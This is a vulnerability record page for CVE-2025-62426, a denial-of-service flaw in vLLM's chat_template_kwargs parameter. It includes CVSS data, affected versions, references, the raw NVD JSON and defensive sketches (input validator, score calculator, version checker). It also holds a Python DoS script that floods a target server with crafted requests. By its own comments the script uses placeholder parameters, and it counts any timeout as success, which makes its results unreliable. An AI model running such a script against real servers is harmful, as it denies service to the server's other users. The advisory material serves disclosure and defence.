CVE-2025-62426

Description

vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1.
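The description's core point is ordering: request-supplied keyword arguments should be checked before they reach template rendering. A minimal defensive sketch of that idea follows. It is not vLLM's actual patch; `validate_template_kwargs`, `ALLOWED_TEMPLATE_KWARGS`, the key names in the allowlist, and the `max_keys` limit are all hypothetical and chosen only for illustration.

```python
from collections.abc import Mapping
from typing import Any, Optional

# Hypothetical allowlist (an assumption, not taken from vLLM). A real deployment
# would derive it from the variables its configured chat template declares.
ALLOWED_TEMPLATE_KWARGS = frozenset({"enable_thinking", "reasoning_effort"})


def validate_template_kwargs(
    kwargs: Optional[Mapping[str, Any]],
    allowed: frozenset = ALLOWED_TEMPLATE_KWARGS,
    max_keys: int = 16,
) -> dict:
    """Reject unexpected keys before the kwargs are used for anything else."""
    if kwargs is None:
        return {}
    if not isinstance(kwargs, Mapping):
        raise TypeError("chat_template_kwargs must be a JSON object")
    if len(kwargs) > max_keys:
        raise ValueError("too many chat_template_kwargs entries")
    unknown = sorted(str(key) for key in kwargs if key not in allowed)
    if unknown:
        raise ValueError(f"unsupported chat_template_kwargs: {unknown}")
    # Return a plain copy so later code cannot mutate the request body.
    return dict(kwargs)
```

In a gateway or proxy placed in front of an unpatched server, a check like this would run on the parsed request body before the request is forwarded. Upgrading to 0.11.1 remains the fix named in the advisory.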

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
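To show how the vector above yields the listed score, here is a small sketch of the CVSS v3.1 base score equations. The function and constant names are my own. The metric weights and rounding rule follow the published v3.1 specification as I understand it, so treat this as an illustration and not a reference calculator.

```python
import math

# Metric weights from the CVSS v3.1 specification.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when Scope is Changed.
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """Round up to one decimal place using the v3.1 integer-based rule."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a CVSS:3.1 vector string."""
    prefix, *parts = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("only CVSS:3.1 vectors are handled in this sketch")
    m = dict(part.split(":", 1) for part in parts)
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = (
        8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]] * pr * WEIGHTS["UI"][m["UI"]]
    )
    iss = 1 - (
        (1 - WEIGHTS["C"][m["C"]]) * (1 - WEIGHTS["I"][m["I"]]) * (1 - WEIGHTS["A"][m["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"))  # 6.5
```

For this vector the intermediate values are roughly 2.8 for exploitability and 3.6 for impact, which agrees with the exploitabilityScore and impactScore in the raw JSON record.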

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* (versions from 0.5.5 up to, but excluding, 0.11.1) - VULNERABLE

cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:* - VULNERABLE

vLLM >= 0.5.5 and < 0.11.1
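The affected range can be checked mechanically against an installed version string. The sketch below uses only the standard library. `is_affected` and its constants are hypothetical names, and the version parsing is deliberately simplified: it assumes a `major.minor.patch` prefix and does not implement full PEP 440 ordering, so pre-releases of versions other than 0.11.1 are judged by their release numbers alone.

```python
import re

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(.*)$")

FIRST_AFFECTED = (0, 5, 5)
FIRST_FIXED = (0, 11, 1)
# Release candidates of the fixed version that the CPE list marks as vulnerable.
AFFECTED_PRERELEASES = {"rc0", "rc1"}


def is_affected(version: str) -> bool:
    """Return True if the version falls in the range listed for CVE-2025-62426."""
    match = _VERSION_RE.match(version.strip().lstrip("v"))
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    release = tuple(int(part) for part in match.group(1, 2, 3))
    suffix = match.group(4)
    if FIRST_AFFECTED <= release < FIRST_FIXED:
        return True
    # 0.11.1 itself is patched, but its rc0 and rc1 builds are listed as vulnerable.
    return release == FIRST_FIXED and suffix in AFFECTED_PRERELEASES


for candidate in ("0.5.4", "0.5.5", "0.10.2", "0.11.1rc1", "0.11.1"):
    print(candidate, is_affected(candidate))
```

On a host with vLLM installed, the input string could come from `importlib.metadata.version("vllm")`.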

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-62426 PoC - vLLM chat_template_kwargs DoS
This PoC demonstrates the denial of service vulnerability in vLLM's 
chat_template_kwargs parameter handling.
"""

import requests
import json
import time
import concurrent.futures

TARGET_URL = "http://target-server:8000/v1/chat/completions"

def trigger_dos():
    """
    Send a malicious request with crafted chat_template_kwargs
    to trigger long processing time.
    """
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer YOUR_API_KEY"
    }
    
    # Craft malicious payload with problematic chat_template_kwargs
    payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [
            {"role": "user", "content": "Hello"}
        ],
        # Placeholder chat_template_kwargs: these keys are illustrative only;
        # the record does not state which parameters trigger the issue
        "chat_template_kwargs": {
            "loop_trigger": True,
            "nested_data": {"level1": {"level2": {"level3": {"level4": {"level5": "x" * 1000}}}}}
        }
    }
    
    try:
        response = requests.post(
            TARGET_URL,
            headers=headers,
            json=payload,
            timeout=5
        )
        print(f"Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("Request timed out - DoS successful")
    except Exception as e:
        print(f"Error: {e}")

def verify_dos():
    """
    Verify that the server is unresponsive after DoS attack.
    """
    normal_payload = {
        "model": "meta-llama/Llama-3-8b",
        "messages": [{"role": "user", "content": "Hi"}]
    }
    
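    try:
        response = requests.post(
            TARGET_URL,
            # Same placeholder credentials as trigger_dos(); without them an
            # auth-enabled server answers 401 and would look unresponsive
            headers={"Authorization": "Bearer YOUR_API_KEY"},
            json=normal_payload,
            timeout=10
        )
        return response.status_code == 200
    except requests.exceptions.RequestException:
        # Connection errors and timeouts both count as unavailable
        return False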

if __name__ == "__main__":
    print("[*] Starting CVE-2025-62426 DoS attack...")
    
    # Send multiple malicious requests
    with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
        futures = [executor.submit(trigger_dos) for _ in range(3)]
        concurrent.futures.wait(futures)
    
    print("[*] Verifying server availability...")
    time.sleep(2)
    
    if not verify_dos():
        print("[+] DoS confirmed - Server is unresponsive")
    else:
        print("[-] Server still responsive")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62426
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62426
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62426/
[4] VulDB https://vuldb.com/cve/CVE-2025-62426
[5] https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610
[6] https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814
[7] https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b
[8] https://github.com/vllm-project/vllm/pull/27205
[9] https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62426", "sourceIdentifier": "[email protected]", "published": "2025-11-21T02:15:43.570", "lastModified": "2025-12-04T17:42:10.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, the /v1/chat/completions and /tokenize endpoints allow a chat_template_kwargs request parameter that is used in the code before it is properly validated against the chat template. With the right chat_template_kwargs parameters, it is possible to block processing of the API server for long periods of time, delaying all other requests. This issue has been patched in version 0.11.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.5.5", "versionEndExcluding": "0.11.1", "matchCriteriaId": "BA1047E1-ED1E-4685-B699-8CE5B2058D87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc0:*:*:*:*:*:*", "matchCriteriaId": "FEE054E1-1F84-4ACC-894C-D7E3652EF1B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:0.11.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "B05850DF-38FE-439F-9F7A-AA96DA9038CC"}]}]}], "references": [{"url": 
"https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/chat_utils.py#L1602-L1610", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/blob/2a6dc67eb520ddb9c4138d8b35ed6fe6226997fb/vllm/entrypoints/openai/serving_engine.py#L809-L814", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vllm-project/vllm/commit/3ada34f9cb4d1af763fdfa3b481862a93eb6bd2b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vllm-project/vllm/pull/27205", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-69j4-grxj-j64p", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}